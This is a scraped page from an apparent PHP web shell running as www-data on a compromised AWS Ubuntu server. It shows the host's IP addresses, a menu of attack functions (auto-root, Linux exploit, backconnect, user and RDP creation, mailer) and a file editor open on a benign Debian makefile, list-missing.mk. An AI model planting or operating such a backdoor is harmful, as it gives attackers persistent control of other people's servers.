Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.191.103.10
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
pkg-kde-tools /
qt-kde-team /
3 /
[ HOME SHELL ]
Name
Size
Permission
Action
policy
[ DIR ]
drwxr-xr-x
README
2.83
KB
-rw-r--r--
commands
1.25
KB
-rw-r--r--
debian-qt-kde.mk
3.7
KB
-rw-r--r--
dhmk.mk
5.75
KB
-rw-r--r--
dhmk.pl
13.55
KB
-rwxr-xr-x
library-packages.mk
1.98
KB
-rw-r--r--
lintian.mk
972
B
-rw-r--r--
list-missing.mk
2.1
KB
-rw-r--r--
policy.mk
645
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : list-missing.mk
# Copyright © 2003 Colin Walters <walters@debian.org> # Copyright © 2005-2011 Jonas Smedegaard <dr@jones.dk> # Copyright © 2010-2011 Modestas Vainius <modax@debian.org> # Description: Defines various random rules, including a list-missing rule # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as # published by the Free Software Foundation; either version 2, or (at # your option) any later version. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. ifdef dqk_dir list-missing: @echo "=== Start list-missing"; \ if test -d debian/tmp; then \ (cd debian/tmp && find . -type f -o -type l | grep -v '/DEBIAN/' | sort) > debian/dhmk-install-list; \ (for package in $(shell dh_listpackages); do \ (cd debian/$$package && find . -type f -o -type l); \ done; \ test -e debian/not-installed && sed '/^#/d;/^$$/d;s|/$$||;/^\.\//!s|^|./|' debian/not-installed | \ while read glob_patt; do \ (cd debian/tmp; find . '(' -path "$${glob_patt}" -o -path "$${glob_patt}"'/*' ')' '(' -type f -o -type l ')'); \ done; \ ) | sort -u > debian/dhmk-package-list; \ diff -u debian/dhmk-install-list debian/dhmk-package-list | sed '1,2d' | egrep '^-' || true; \ echo "=== End list-missing"; \ else \ echo "=== End list-missing"; \ echo "All files were installed into debian/$(shell dh_listpackages | head -n1)."; \ fi check-not-installed: @test -e debian/not-installed && \ (for i in $(shell grep -v '^#' debian/not-installed); do \ test -e debian/tmp/$$i || printf "File $$i not found in debian/tmp \n"; \ done;) \ || printf "ERROR: debian/not-installed not found.\n" post_clean: rm -f debian/dhmk-install-list debian/dhmk-package-list .PHONY: list-missing check-not-installed endif
Close